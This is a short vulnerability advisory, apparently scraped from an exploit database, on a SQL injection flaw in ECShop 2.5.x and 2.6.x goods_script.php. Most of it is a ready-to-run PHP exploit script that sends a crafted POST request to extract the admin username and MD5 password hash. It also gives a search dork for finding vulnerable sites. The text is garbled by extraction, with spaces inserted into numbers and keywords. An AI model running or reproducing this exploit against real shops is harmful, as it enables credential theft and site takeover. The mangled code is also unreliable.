ECShop2. 5. x&2.6. x injection exploit-vulnerability warning-the black bar safety net

2010-07-22T00:00:00
ID MYHACK58:62201027665
Type myhack58
Reporter 佚名
Modified 2010-07-22T00:00:00

Description

ECShop2. 5. x&2.6. x goods_script.php no initialization SQL, leading to injection vulnerabilities

Effect 2. 5. x and 2. 6. x,other versions not tested

goods_script. php44 line:injection / admin credentials disclosure exploit

if (emptyempty($_GET['type'])) { ... } elseif ($_GET['type'] == 'collection') { ... } $sql .= "LIMIT" . (! emptyempty($_GET['goods_num']) ? intval($_GET['goods_num']) : 1 0); $res = $db->query($sql); $sql is not initialized,obviously a bug:)

EXP:

!/ usr/bin/php <? php print_r(' +---------------------------------------------------------------------------+ ECShop <= v2. 6. 2 SQL by puret_t mail: cnhackerx at 1 6 3 dot com team: http://hi.baidu.com/5427518 dork: "Powered by ECShop" +---------------------------------------------------------------------------+ '); / * works with register_globals = On / if ($argc < 3) { print_r(' +---------------------------------------------------------------------------+ Usage: php '.$ argv[0].' host path host: target server (ip/hostname) path: path to ecshop Example: php '.$ argv[0].' localhost /ecshop/ +---------------------------------------------------------------------------+ '); exit; } error_reporting(7); ini_set('max_execution_time', 0); $host = $argv[1]; $path = $argv[2]; $resp = send(); preg_match('#href="([\S]+):([a-z0-9]{3 2})"#', $resp, $hash); if ($hash) exit("Expoilt Success!\ nadmin:\t$hash[1]\nPassword(md5):\t$hash[2]\n"); else exit("Exploit Failed!\ n"); function send() { global $host, $path; $cmd = 'sql=SELECT CONCAT(user_name,0x3a,password) as goods_id FROM ecs_admin_user WHERE action_list=0x'. bin2hex('all').' LIMIT 1#'; $data = "POST ".$ path."goods_script. php? type=". time()." HTTP/1.1\r\n"; $data .= "Accept: /*\r\n"; $data .= "Accept-Language: zh-cn\r\n"; $data .= "Content-Type: application/x-www-form-urlencoded\r\n"; $data .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n"; $data .= "Host: $host\r\n"; $data .= "Content-Length: ". strlen($cmd)."\ r\n"; $data .= "Connection: Close\r\n\r\n"; $data .= $cmd; $fp = fsockopen($host, 8 0); fputs($fp, $data); $resp = "; while ($fp && ! feof($fp)) $resp .= fread($fp, 1 0 2 4); return $resp; } ?& gt;

Release date: 2010-07. 1 9 Publishing author: Ryat affects versions: ECShop2. 5. x&2.6. x Official address:www.ecshop.com